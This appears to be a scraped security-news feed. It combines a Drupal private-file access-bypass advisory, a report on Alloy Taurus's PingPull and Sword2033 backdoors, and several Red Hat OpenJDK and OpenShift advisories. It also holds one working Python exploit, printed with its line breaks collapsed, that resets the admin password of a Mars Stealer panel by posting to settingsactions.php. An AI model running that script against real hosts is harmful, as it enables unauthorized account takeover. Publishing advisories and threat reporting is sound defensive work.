The file download facility doesn't sufficiently sanitize file paths in certain situations. This may result in users gaining access to private files that they should not have access to. Some sites may require configuration changes following this security release. Review the release notes for your Drupal version if you have issues accessing private files after updating.

Description: 

The file download facility doesn't sufficiently sanitize file paths in certain situations. This may result in users gaining access to private files that they should not have access to.

Some sites may require configuration changes following this security release. Review the release notes for your Drupal version if you have issues accessing private files after updating.

This advisory **is** covered by Drupal Steward. Because this vulnerability is not mass exploitable, your Steward partner may respond by monitoring-only, rather than enforcing a new WAF rule.

We would normally not apply for a release of this severity. However, in this case we have chosen to apply Drupal Steward security coverage to test our processes.

**Drupal 7**

*   All Drupal 7 sites on Windows web servers are vulnerable.
*   Drupal 7 sites on Linux web servers are vulnerable with certain file directory structures, or if a vulnerable contributed or custom file access module is installed.

**Drupal 9 and 10**

Drupal 9 and 10 sites are only vulnerable if certain contributed or custom file access modules are installed.

CVE-2023-31250: Drupal core - Moderately critical - Access bypass - SA-CORE-2023-005

The Chinese nation-state group dubbed Alloy Taurus is using a Linux variant of a backdoor called PingPull as well as a new undocumented tool codenamed Sword2033.
That's according to findings from Palo Alto Networks Unit 42, which discovered recent malicious cyber activity carried out by the group targeting South Africa and Nepal.
Alloy Taurus is the constellation-themed moniker assigned to a

The Chinese nation-state group dubbed **Alloy Taurus** is using a Linux variant of a backdoor called PingPull as well as a new undocumented tool codenamed Sword2033.

That's according to findings from Palo Alto Networks Unit 42, which discovered recent malicious cyber activity carried out by the group targeting South Africa and Nepal.

Alloy Taurus is the constellation-themed moniker assigned to a threat actor that's known for its attacks targeting telecom companies since at least 2012. It's also tracked by Microsoft as Granite Typhoon (previously Gallium).

Last month, the adversary was attributed to a campaign called Tainted Love targeting telecommunication providers in the Middle East as part of a broader operation referred to as Soft Cell.

Recent cyber espionage attacks mounted by Alloy Taurus have also broadened their victimology footprint to include financial institutions and government entities.

PingPull, first documented by Unit 42 in June 2022, is a remote access trojan that employs the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications.

The Linux flavor of the malware boasts of similar functionalities as its Windows counterpart, allowing it to carry out file operations and run arbitrary commands by transmitting from the C2 server a single upper case character between A and K, and M.

"Upon execution, this sample is configured to communicate with the domain yrhsywu2009.zapto\[.\]org over port 8443 for C2," Unit 42 said. "It uses a statically linked OpenSSL (OpenSSL 0.9.8e) library to interact with the domain over HTTPS."

Interestingly, PingPull's parsing of the C2 instructions mirrors that of the China Chopper, a web shell widely used by Chinese threat actors, suggesting that the threat actor is repurposing existing source code to devise custom tools.

A closer examination of the aforementioned domain has also revealed the existence of another ELF artifact (i.e., Sword2033) that supports three basic functions, including uploading and exfiltrating files and executing commands.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The malware's links to Alloy Taurus stems from the fact that the domain resolved to an IP address that was previously identified as an active indicator of compromise (IoC) associated with a prior campaign targeting companies operating in Southeast Asia, Europe, and Africa.

The targeting of South Africa, per the cybersecurity company, comes against the backdrop of the country holding a joint 10-day naval drill with Russia and China earlier this year.

"Alloy Taurus remains an active threat to telecommunications, finance and government organizations across Southeast Asia, Europe and Africa," Unit 42 said.

"The identification of a Linux variant of PingPull malware, as well as recent use of the Sword2033 backdoor, suggests that the group continues to evolve their operations in support of their espionage activities."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Spotted Using Linux Variant of PingPull in Targeted Cyberattacks

Red Hat Security Advisory 2023-2023-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Data Foundation 4.11.7 Bug Fix and security update  
Advisory ID:       RHSA-2023:2023-01  
Product:           RHODF  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2023  
Issue date:        2023-04-26  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-4304   
                   CVE-2022-4415 CVE-2022-4450 CVE-2022-40186   
                   CVE-2022-40897 CVE-2022-45061 CVE-2022-48303   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-0361   
                   CVE-2023-23916   
=====================================================================

1. Summary:

Updated images that fix several bugs are now available for Red Hat  
OpenShift Data Foundation 4.11.7 on Red Hat Enterprise Linux 8 from Red Hat  
Container Registry.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated  
with and optimized for the Red Hat OpenShift Data Foundation. Red Hat  
OpenShift Data Foundation is a highly scalable, production-grade persistent  
storage for stateful applications running in the Red Hat OpenShift  
Container Platform. In addition to persistent storage, Red Hat OpenShift  
Data Foundation provisions a multicloud data management service with an S3  
compatible API.

Security Fix(es):

* vault: Vault Entity Alias Metadata May Leak Between Aliases With The Same  
Name Assigned To The Same Entity (CVE-2022-40186)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All users of Red Hat OpenShift Data Foundation are advised to upgrade to  
these updated images, which provide several bug fixes.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2171965 - [4.11 clone] Secrets are used in env variables  
2176012 - [ODF 4.11] Move the defaults for rookceph operator from configmap to csv  
2181405 - CVE-2022-40186 vault: Vault Entity Alias Metadata May Leak Between Aliases With The Same Name Assigned To The Same Entity  
2183683 - [ODF 4.11] Deployment of ODF 4.9 over external mode failing with: panic: assignment to entry in nil map in ocs-operator logs  
2186456 - Include at ODF 4.11 container images the RHEL8 CVE fix on "openssl"

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-40186  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEkQztzjgjWX9erEAQgqiQ//QNYPbRoFnC155vDFDqfb/Xen4MISMAL3  
0ttVhQtlpAFvDpawOGKSU6VpSg5RTdjMebmGdJ33CiP/BQTyU+jA0jwVFlo47mqi  
gfMKWhyn36+Y/Jy/n3QAbM3AoZpojuqHHac+nu5PipUVo2qUe8CvqG/yqb/bx/0P  
mAMpbC2CWead2YRsWRAyTtwODCp5LV12X9zKQN4lLd04KEsYHBxKM4FnMA/FuY25  
j39k/hGLvH7bH45okcnE/36aiGtiwPMnpg8Vilt0kBCGlSZTnhbs1wrJ7rsdoECi  
+g2jA62Rfnb4I8/u9L16RZeKagM76nNlkeCPvgW7SyXOcuHiE/uK3e6XkrqxT9I/  
v1bjt7w3KVuJKIz48XOsIVnUZ6XpbMdHUQAmTjYOBR59Fpjh3eKlV294XY97FqSk  
LWH9PC6A347xrwEPx8A0xtVAYH91Kxn2IL5qHB9NxQpUffZhBHj5er8gowIpGvUN  
PyhjibxA38UFhNNVYvgDNFC547V56KlJGwczuTAMVdyVLCPId86Rvo3PqM1gv567  
iS14t91UNPWhkPkfibQy+jnI2YJuIKjuDYEIBto3Ys4Zmf8ha2WKx8B+PN7KNe8R  
0z6xsMUrj+CHbBkuq1rPE+CW0XbXqsb1vRP2H2ucTByStag163Ll833x//FvOE/l  
SN9bgU5rjbk=  
=T/2V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2023-01

Red Hat Security Advisory 2023-1884-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenJDK 17.0.7 Security Update for Portable Linux Builds  
Advisory ID:       RHSA-2023:1884-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1884  
Issue date:        2023-04-19  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and  
the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.7) for portable Linux  
serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.6) and  
includes security and bug fixes, and enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

5. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEguotzjgjWX9erEAQjWaw//f/1fGZLdxS+l3gHG3PYKIYAIatYKQLxX  
PkjB56ZS3en4X+2Sj12m1ePTVKZOOVX4G5EE+CxJXhn1SwvkCZFclWMAEVvQaSda  
bI5rGGIv32mk44X7KmwsyOQyg5HsyRF34JHudNiBNDfWtXnaev4hoYU3m64Z1M3p  
TWn+2OqMXCEYYmoMzwdH7NTTk80jd9dP6NvwSoUhHHLs/z6YvtB9GP1/349tutIW  
AOVemoO06mezefFtGnua79n0F7RJNPrhFa5QtiRmuCjYk9f1AepwF3YEU+3aXd1h  
m1Xul/4Kfy5koYvHSRpabO+aBtz/3yFKEVE8aZTRi+t536RLRfEnbWFIBcLNCi17  
J2Y0uTOR+H+eiwJnBL8g2QKl/7cGpqFXziUSuiytk0hoTmIKKoC0T4bmZU2pb3nv  
YMRMRb9iHoL1D+dUZjLDpV2O/jW9EdBn+UTdcMEvdRiTSOXzePiZfTpmwdrcI0GC  
i+SJnw7+MT9ExoyDaJhpgwS2BsTPpW86mhi2SgsnOOSUh8jAyJmQxVZhJehFzpa6  
Wz3cUK2bGJWeeP66RS9Ud+MdQcDdZVFFXKHt4/3WCX4YP7TrhqE71l0ZrYh+znr/  
0il5mhtN64F9WRTSQeFad6HKosNN5iUDZCJTwnvStf9R5+PzJEYXBX9xzcW8zyon  
ReUtQp2BJw8=  
=vr4N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1884-01

Mars Stealer version 8.3 suffers from an account takeover vulnerability.

    # Exploit Title: Mars Stealer 8.3 - Admin Account Takeover# Product: Mars Stelaer# Technology: PHP# Version: < 8.3# Google Dork: N/A# Date: 20.04.2023# Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_limport argparseimport requestsparser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')args = parser.parse_args()url = args.url.rstrip('/') + '/includes/settingsactions.php'headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}data = {"func": "savepwd", "pwd": "sköll"} #change passwordresponse = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Succesfull!")    print("New Password: " + data["pwd"])else:  print("Exploit Failed!")

Mars Stealer 8.3 Account Takeover

Red Hat Security Advisory 2023-1911-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2023:1911-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1911  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.el8_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.el8_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgue9zjgjWX9erEAQiNng/+Na7FF9ZJt2OPlvMgG3pBVJ5n5JlhFDRp  
uwgOPLBpQ+2cOPbEHx1DPzUDg410+h5c7g4pDsTNqQCvLpgIjUbXoPj0tF+xwKEi  
hKoqI07lOewIjWf9dD8LHiSXJOHpaDZ30+494Ufkn/tqsdyRNQJiDBJXINUp0BI9  
MGz5n/1sMU8Gcqgwmmi6W7Sq72wGdu+I1ozdS9ivukqJ9j0l5vNNsellSAk8+Cly  
GoL4hXMyfVpbjhmB/NHvO79TLzo9VrYjCPN9lO0S9mBGn0xvcsnEc1yQrGIn0fLb  
yU1ualEGZ5RVncXiKN/FLyJoexq/59cV66jHs5qbtj2YI8eEbU9JZN6uwnGJ1I8G  
CqEmwF6m5GEdGQyaheTQZU3hoLek2EFhbqrZ1e9lsE4StVLDg0tkZjMLNaFLBzSN  
ik373Tu6TkNdQ3kGjtAqMFmCv5IY9aUhJzqQDdCpaYQU9USpID636rr9+Qsblm4F  
vwwtv6g2WuJjzECrPtIa5iUZBwJT8NpC0uZYU1tXe9j3msKArDk52DcmxJ9DZ8S8  
oSBHGHXu+VmFdG3tzx8U5c+g6pSQY9w3lFMlSuVJCyx2z8zwhiwgjio29y7SXHzw  
aYOVQHoZPMBN9WBvenDlqmQC40D/g82LBFIzEzJF0QRCCAZ+89qB6C4g8TFwKtDd  
A2t9ncHN120=  
=/t5p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1911-01

Red Hat Security Advisory 2023-1891-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1891-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1891  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186828)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186832)

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186836)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186828 - Enable XML Signature provider in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186832 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186836 - Add missing attributes when registering services in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
java-17-openjdk-17.0.7.0.7-1.el8_6.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
